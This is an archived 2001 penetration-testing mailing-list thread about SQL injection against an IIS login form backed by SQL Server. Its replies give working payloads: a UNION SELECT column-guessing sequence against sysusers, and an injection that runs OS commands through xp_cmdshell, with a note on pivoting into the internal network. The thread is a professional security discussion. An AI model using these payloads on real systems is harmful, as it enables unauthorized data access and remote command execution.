Penetration Testing mailing list archives
RE: SQL
From: "rudi carell" <rudicarell () hotmail com>
Date: Thu, 22 Nov 2001 07:55:35
Andrew said:
Don't you need the returned recordset to be written to the html stream in order to see anything useful? For instance if you are just looking at a login page you may not get any joy with appending extra SELECTs? We have just been playing with exactly this! Andrew Miller
.. yes,but .. the first thing is .. there is no need for html-output when you can execute system-commands (xp_cmdshell..,sp_adduser etc ....)
and htmloutput can be achieved by a) using aliases (AS) b) brute-force the column(s) you can see within output using "UNION" HowTo: 1)guess the number of columns from table A by Column-Padding (see example) 2)find the right column number within Query (see example) 3)if necessary typecast columns example: ---cut here--- sequence I [original] union select '1' from sysusers;-- [original] union select '1','1' from sysusers;-- [original] union select '1','1','1' from sysusers;-- [original] union select '1','1','1','1'from sysusers;-- after no error message sequence II [original] union select name,'1','1','1' from sysusers;-- [original] union select '1',name,'1','1' from sysusers;-- [original] union select '1','1',name,'1','1' from sysusers;-- .. until name appears within html .... tataa ---cut here--- nice day, rc security () freefly com http://www.freefly.com/security/
You migh (90% chance) have a possibility to a) alter the database b) execute remote commands in the SQL server This is a common error (not quoting quotes :), this is due to the SQL statement being executed in the ISS server (through an ODBC connection) is just added the information given by the user. Thus: SELECT * from test where value='$user' if user=' becomes: SELECT * from test where value=''' which generates your error. However, you can do the following if user=test'; select * from test -- becomes: SELECT * from test where value='test'; select * from test -- ' which is a valid SQL statement (two as a matter of fact) and if user=test'; exec master..xp_cmdshell 'dir' -- becomes: SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' -- which will run the 'dir' command in the SQL server (not in the IIS!) This is fun since, in some cases, the ISS server is in a DMZ and the SQL server is in the internal lan or through another firewall like this: Internet ----- Fw -------- Fw --------- Local network | | IIS SQL server or Internet ----- Fw -------- Local network | | IIS SQL server So you might be one step closer to your target ! Some references (fresh out from google): http://www.sqlsecurity.com/faq-inj.asp http://www.silksoft.co.za/data/sqlinjectionattack.htm Regards Javier Fernández-Sanguino Peña > > Hello all, > > > I am doing a pen test against a IIS 5 web server. The web > server requires a > user name and password via a logon form. if a single quote > character is > entered (username)the following error is produced > > [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark > before the character string '' and password=''. > > I remember reading somewhere that this can be used to gain > further access? > but i cant find the info. > > Can any one help? > > Thanks in advance. > > Gary > > > -------------------------------------------------------------- > -------------- > This list is provided by the SecurityFocus Security > Intelligence Alert (SIA) > Service. For more information on SecurityFocus' SIA service which > automatically alerts you to the latest security > vulnerabilities please see: > https://alerts.securityfocus.com/ > ----------------------------------------------------------------------------This list is provided by the SecurityFocus Security Intelligence Alert (SIA)Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ _____________________________________________________________________ This message has been checked for all known viruses by bluesource. For further information visit www.blue-source.com powered by Messagelabs ------------Insight Consulting Limited--------------------------------Insight Consulting Limited is a leading specialist provider of independent services in all aspects of information and communications security, business continuity and risk management from consultancy, implementation, testing and training to recruitment, research and outsourcing.---------------------Disclaimer----------------------------------------Internet communications are not secure and therefore Insight Consulting Limited does not accept legal responsibility for the contents of this message. Any views or opinions presented are solely those of the author and do not necessarily represent those of Insight Consulting Limited unless otherwise specifically stated. If this message is received by anyone other than the addressee, please notify the sender and then delete the message and any attachments from your computer.----------------------------------------------------------------------- ----------------------------------------------------------------------------This list is provided by the SecurityFocus Security Intelligence Alert (SIA)Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
_________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Re: SQL, (continued)
- Re: SQL Kevin Spett (Nov 20)
- Re: SQL root (Nov 20)
- Re: SQL neil-at-geekshanty-dot-com (Nov 20)
- Re: SQL Sverre H. Huseby (Nov 20)
- RE: SQL Holmes, Ben (Nov 20)
- RE: SQL Javier Fernández-Sanguino (Nov 20)
- RE: SQL Paul Midian (Nov 20)
- Re: SQL David . French (Nov 20)
- RE: SQL Andy Miller (Nov 21)
- Re: SQL Andrea secondote? (Nov 22)
- RE: SQL rudi carell (Nov 22)
- RE: SQL Javier Fernández-Sanguino (Nov 23)